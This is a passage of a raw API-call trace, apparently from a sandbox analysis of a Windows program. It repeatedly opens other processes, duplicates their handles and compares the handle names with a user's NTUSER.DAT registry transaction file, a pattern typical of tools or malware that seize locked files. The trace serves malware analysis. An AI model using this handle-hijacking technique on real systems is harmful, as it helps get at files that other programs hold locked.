dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.462] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.462] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.463] CloseHandle (hObject=0x1e4) returned 1 [0166.463] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.463] CloseHandle (hObject=0x194) returned 1 [0166.463] CloseHandle (hObject=0x1e8) returned 1 [0166.463] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0166.463] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.464] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.464] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.465] CloseHandle (hObject=0x1e4) returned 1 [0166.465] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.465] CloseHandle (hObject=0x194) returned 1 [0166.465] CloseHandle (hObject=0x1e8) returned 1 [0166.465] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0166.465] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.466] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.466] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.466] CloseHandle (hObject=0x1e4) returned 1 [0166.466] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.467] CloseHandle (hObject=0x194) returned 1 [0166.467] CloseHandle (hObject=0x1e8) returned 1 [0166.467] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0166.467] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.467] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.468] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.468] CloseHandle (hObject=0x1e4) returned 1 [0166.468] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.468] CloseHandle (hObject=0x194) returned 1 [0166.468] CloseHandle (hObject=0x1e8) returned 1 [0166.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0166.469] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.469] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.470] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.470] CloseHandle (hObject=0x1e4) returned 1 [0166.470] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.470] CloseHandle (hObject=0x194) returned 1 [0166.470] CloseHandle (hObject=0x1e8) returned 1 [0166.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0166.470] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.471] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.472] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.472] CloseHandle (hObject=0x1e4) returned 1 [0166.472] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.472] CloseHandle (hObject=0x194) returned 1 [0166.472] CloseHandle (hObject=0x1e8) returned 1 [0166.472] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0166.472] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.473] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.474] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.474] CloseHandle (hObject=0x1e4) returned 1 [0166.474] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.474] CloseHandle (hObject=0x194) returned 1 [0166.474] CloseHandle (hObject=0x1e8) returned 1 [0166.474] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0166.474] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.475] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.476] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.476] CloseHandle (hObject=0x1e4) returned 1 [0166.476] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.476] CloseHandle (hObject=0x194) returned 1 [0166.476] CloseHandle (hObject=0x1e8) returned 1 [0166.476] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0166.476] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.477] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.478] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.478] CloseHandle (hObject=0x1e4) returned 1 [0166.478] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.478] CloseHandle (hObject=0x194) returned 1 [0166.478] CloseHandle (hObject=0x1e8) returned 1 [0166.478] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x620) returned 0x1e8 [0166.478] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.479] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.479] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.480] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.480] CloseHandle (hObject=0x1e4) returned 1 [0166.480] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.480] CloseHandle (hObject=0x194) returned 1 [0166.480] CloseHandle (hObject=0x1e8) returned 1 [0166.480] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0166.480] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.481] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.482] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.482] CloseHandle (hObject=0x1e4) returned 1 [0166.482] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.482] CloseHandle (hObject=0x194) returned 1 [0166.482] CloseHandle (hObject=0x1e8) returned 1 [0166.482] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x738) returned 0x1e8 [0166.482] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.483] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.484] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.484] CloseHandle (hObject=0x1e4) returned 1 [0166.484] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.484] CloseHandle (hObject=0x194) returned 1 [0166.484] CloseHandle (hObject=0x1e8) returned 1 [0166.484] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0166.484] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.485] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.485] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.486] CloseHandle (hObject=0x1e4) returned 1 [0166.486] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.486] CloseHandle (hObject=0x194) returned 1 [0166.486] CloseHandle (hObject=0x1e8) returned 1 [0166.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x820) returned 0x1e8 [0166.486] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.487] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.488] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.488] CloseHandle (hObject=0x1e4) returned 1 [0166.488] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.488] CloseHandle (hObject=0x194) returned 1 [0166.488] CloseHandle (hObject=0x1e8) returned 1 [0166.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0166.488] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.489] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.489] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.490] CloseHandle (hObject=0x1e4) returned 1 [0166.490] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.490] CloseHandle (hObject=0x194) returned 1 [0166.490] CloseHandle (hObject=0x1e8) returned 1 [0166.490] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x840) returned 0x1e8 [0166.490] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.491] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.491] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.492] CloseHandle (hObject=0x1e4) returned 1 [0166.492] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.492] CloseHandle (hObject=0x194) returned 1 [0166.492] CloseHandle (hObject=0x1e8) returned 1 [0166.492] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0166.492] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.492] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.493] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.494] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.494] CloseHandle (hObject=0x1e4) returned 1 [0166.494] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.494] CloseHandle (hObject=0x194) returned 1 [0166.494] CloseHandle (hObject=0x1e8) returned 1 [0166.494] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x850) returned 0x1e8 [0166.494] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.495] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.496] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.496] CloseHandle (hObject=0x1e4) returned 1 [0166.496] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.496] CloseHandle (hObject=0x194) returned 1 [0166.496] CloseHandle (hObject=0x1e8) returned 1 [0166.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0166.496] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.497] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.498] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.498] CloseHandle (hObject=0x1e4) returned 1 [0166.498] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.498] CloseHandle (hObject=0x194) returned 1 [0166.498] CloseHandle (hObject=0x1e8) returned 1 [0166.498] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x860) returned 0x1e8 [0166.498] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.499] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.500] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.500] CloseHandle (hObject=0x1e4) returned 1 [0166.500] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.500] CloseHandle (hObject=0x194) returned 1 [0166.500] CloseHandle (hObject=0x1e8) returned 1 [0166.500] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0166.500] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.501] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.502] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.502] CloseHandle (hObject=0x1e4) returned 1 [0166.502] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.502] CloseHandle (hObject=0x194) returned 1 [0166.502] CloseHandle (hObject=0x1e8) returned 1 [0166.502] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x870) returned 0x1e8 [0166.502] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.503] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.504] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.504] CloseHandle (hObject=0x1e4) returned 1 [0166.504] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.504] CloseHandle (hObject=0x194) returned 1 [0166.504] CloseHandle (hObject=0x1e8) returned 1 [0166.504] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0166.504] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.505] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.506] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.506] CloseHandle (hObject=0x1e4) returned 1 [0166.506] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.506] CloseHandle (hObject=0x194) returned 1 [0166.506] CloseHandle (hObject=0x1e8) returned 1 [0166.506] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x890) returned 0x1e8 [0166.506] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.508] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.511] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.512] CloseHandle (hObject=0x1e4) returned 1 [0166.512] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.512] CloseHandle (hObject=0x194) returned 1 [0166.512] CloseHandle (hObject=0x1e8) returned 1 [0166.512] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0166.512] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.513] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.513] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.514] CloseHandle (hObject=0x1e4) returned 1 [0166.514] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.514] CloseHandle (hObject=0x194) returned 1 [0166.514] CloseHandle (hObject=0x1e8) returned 1 [0166.514] OpenProcess (dwDesiredAccess=0x100441, 